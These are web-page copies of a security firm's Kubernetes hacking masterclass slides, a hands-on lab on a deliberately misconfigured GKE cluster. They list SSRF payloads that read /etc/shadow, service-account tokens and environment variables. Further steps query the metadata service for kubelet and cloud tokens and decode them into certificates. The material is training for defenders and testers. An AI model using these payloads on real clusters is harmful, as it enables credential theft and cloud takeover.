SlideShare a Scribd company logo

Appsecco Kubernetes Hacking Masterclass Presentation Slides

Appsecco
Appsecco

Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information. These slides are to be used with the masterclass video recording on YouTube - Hands on exercises are highly recommended to get the most out of this class!

Software
1 of 29
Download to read offline
Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
Let's deploy our cluster! (Lab setup)
Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
Kubernetes Security Controls (Hands-On)
Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
Role ClusterRole ClusterRoleBinding RoleBinding
Abusing RBAC privileges from within pods (Hands-On)
• All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
• Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
• The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
• Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
Post Exploitation in GKE (Hands-On / Homework)
We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
Env vars inside pod
kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
Google Cloud Compute SA Token Stealing
Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
Q&A
• Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers

Recommended

Wireshark
WiresharkWireshark
Wiresharkashiesh0007
 
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)PACE-IT, Security+1.1: Introduction to Network Devices (part 1)
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)Pace IT at Edmonds Community College
 
Muduo network library
Muduo network libraryMuduo network library
Muduo network libraryShuo Chen
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Under The Hood Of A Shard-Per-Core Database Architecture
Under The Hood Of A Shard-Per-Core Database ArchitectureUnder The Hood Of A Shard-Per-Core Database Architecture
Under The Hood Of A Shard-Per-Core Database ArchitectureScyllaDB
 
How to improve ELK log pipeline performance
How to improve ELK log pipeline performanceHow to improve ELK log pipeline performance
How to improve ELK log pipeline performanceSteven Shim
 
Real Time search using Spark and Elasticsearch
Real Time search using Spark and ElasticsearchReal Time search using Spark and Elasticsearch
Real Time search using Spark and ElasticsearchSigmoid
 
ClientServer Websocket.pptx
ClientServer Websocket.pptxClientServer Websocket.pptx
ClientServer Websocket.pptxMaxamedSheekhAmiin
 

Recommended

Wireshark
WiresharkWireshark
Wiresharkashiesh0007
 
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)PACE-IT, Security+1.1: Introduction to Network Devices (part 1)
PACE-IT, Security+1.1: Introduction to Network Devices (part 1)Pace IT at Edmonds Community College
 
Muduo network library
Muduo network libraryMuduo network library
Muduo network libraryShuo Chen
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Under The Hood Of A Shard-Per-Core Database Architecture
Under The Hood Of A Shard-Per-Core Database ArchitectureUnder The Hood Of A Shard-Per-Core Database Architecture
Under The Hood Of A Shard-Per-Core Database ArchitectureScyllaDB
 
How to improve ELK log pipeline performance
How to improve ELK log pipeline performanceHow to improve ELK log pipeline performance
How to improve ELK log pipeline performanceSteven Shim
 
Real Time search using Spark and Elasticsearch
Real Time search using Spark and ElasticsearchReal Time search using Spark and Elasticsearch
Real Time search using Spark and ElasticsearchSigmoid
 
ClientServer Websocket.pptx
ClientServer Websocket.pptxClientServer Websocket.pptx
ClientServer Websocket.pptxMaxamedSheekhAmiin
 
Socket Programming
Socket ProgrammingSocket Programming
Socket Programmingelliando dias
 
WSDL
WSDLWSDL
WSDLAkshay Ballarpure
 
Introduction to Binary Exploitation
Introduction to Binary Exploitation Introduction to Binary Exploitation
Introduction to Binary Exploitation Cysinfo Cyber Security Community
 
Integrate LLM in your applications 101
Integrate LLM in your applications 101 Integrate LLM in your applications 101
Integrate LLM in your applications 101 Marco De Nittis
 
10 tk3193-ids
10 tk3193-ids10 tk3193-ids
10 tk3193-idsSetia Juli Irzal Ismail
 
HTTP Basics
HTTP BasicsHTTP Basics
HTTP Basicssanjoysanyal
 
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...Docker, Inc.
 
Data Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet EncryptionData Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet EncryptionDatabricks
 
CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02Irsandi Hasan
 
Socket Programming_theory.ppt
Socket Programming_theory.pptSocket Programming_theory.ppt
Socket Programming_theory.pptmdrobinhossain4
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory EnumerationDaniel López Jiménez
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Socket programming
Socket programmingSocket programming
Socket programmingMuhammad Fouad Ilyas Siddiqui
 
Toi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dungToi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dungIT Expert Club
 
HTTP/3 for everyone
HTTP/3 for everyoneHTTP/3 for everyone
HTTP/3 for everyoneDaniel Stenberg
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Internet protocol
Internet protocol Internet protocol
Internet protocol Bint Javed
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes ClusterSuman Chakraborty
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019Kumton Suttiraksiri
 

More Related Content

What's hot

Integrate LLM in your applications 101
Integrate LLM in your applications 101 Integrate LLM in your applications 101
Integrate LLM in your applications 101 Marco De Nittis
 
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...Docker, Inc.
 
Data Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet EncryptionData Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet EncryptionDatabricks
 
CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02Irsandi Hasan
 
Socket Programming_theory.ppt
Socket Programming_theory.pptSocket Programming_theory.ppt
Socket Programming_theory.pptmdrobinhossain4
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory EnumerationDaniel López Jiménez
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Toi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dungToi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dungIT Expert Club
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Internet protocol
Internet protocol Internet protocol
Internet protocol Bint Javed
 

What's hot (20)

Socket Programming
Socket ProgrammingSocket Programming
Socket Programming
 
WSDL
WSDLWSDL
WSDL
 
Introduction to Binary Exploitation
Introduction to Binary Exploitation Introduction to Binary Exploitation
Introduction to Binary Exploitation
 
Integrate LLM in your applications 101
Integrate LLM in your applications 101 Integrate LLM in your applications 101
Integrate LLM in your applications 101
 
10 tk3193-ids
10 tk3193-ids10 tk3193-ids
10 tk3193-ids
 
HTTP Basics
HTTP BasicsHTTP Basics
HTTP Basics
 
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
Cilium - Network and Application Security with BPF and XDP Thomas Graf, Cova...
 
Data Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet EncryptionData Security at Scale through Spark and Parquet Encryption
Data Security at Scale through Spark and Parquet Encryption
 
CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02CCNA v6.0 ITN - Chapter 02
CCNA v6.0 ITN - Chapter 02
 
Socket Programming_theory.ppt
Socket Programming_theory.pptSocket Programming_theory.ppt
Socket Programming_theory.ppt
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory Enumeration
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
Socket programming
Socket programmingSocket programming
Socket programming
 
Toi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dungToi uu hoa he thong 30 trieu nguoi dung
Toi uu hoa he thong 30 trieu nguoi dung
 
HTTP/3 for everyone
HTTP/3 for everyoneHTTP/3 for everyone
HTTP/3 for everyone
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Internet protocol
Internet protocol Internet protocol
Internet protocol
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides

12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes ClusterSuman Chakraborty
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019Kumton Suttiraksiri
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security JourneyJerry Jalava
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2Alfonso Martino
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKESreenivas Makam
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)William Yeh
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDays Riga
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaQbox
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...Jitendra Bafna
 
Kubernetes Architecture with Components
Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with ComponentsAjeet Singh
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudAjeet Singh
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operatorspeychevi
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Davide Benvegnù
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Michael Man
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMalcolm Duncanson, CISSP
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides (20)

12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
 
Kubernetes Architecture with Components
Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Intro to kubernetes
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
 
Kubernetes security with AWS
Kubernetes security with AWSKubernetes security with AWS
Kubernetes security with AWS
 

More from Appsecco

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppAppsecco
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020Appsecco
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019Appsecco
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco
 

More from Appsecco (7)

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
 

Recently uploaded

Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
